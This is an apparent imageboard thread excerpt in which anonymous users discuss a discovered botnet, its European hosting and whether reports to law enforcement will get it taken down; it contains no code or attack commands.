The host may be malware-friendly, unfortunately. They're European, so American authorities can't do much about it with a lot of work.

Even if it takes a while for something to happen, law enforcement will definitely begin an investigation on this guy if they receive enough reports.

>> No.24455698

>>24455690

By the time something happens, they would move hosts, etc....

Honestly, it's like /g/s first botnet find.

>> No.24455765

>>24455660
see
>>24455690
>implying anything Amerifagia does will have a quick response in Eurofagia
>"completing" missining the point

>> No.24455830

>>24455765

And that's a good reason why it will be ignored.

A botnet of that size, after being reported and exposed usually get suspended in 24hours, or the following week.

But the bot could easily have multiply servers it connects to we don't know about, so it's a win,lose situation.

>> No.24455830,1 [INTERNAL] 

Dix

>>
Name (leave empty)
Comment (leave empty)
Name
E-mail
Subject
Comment
Password [?]Password used for file deletion.
reCAPTCHA
Action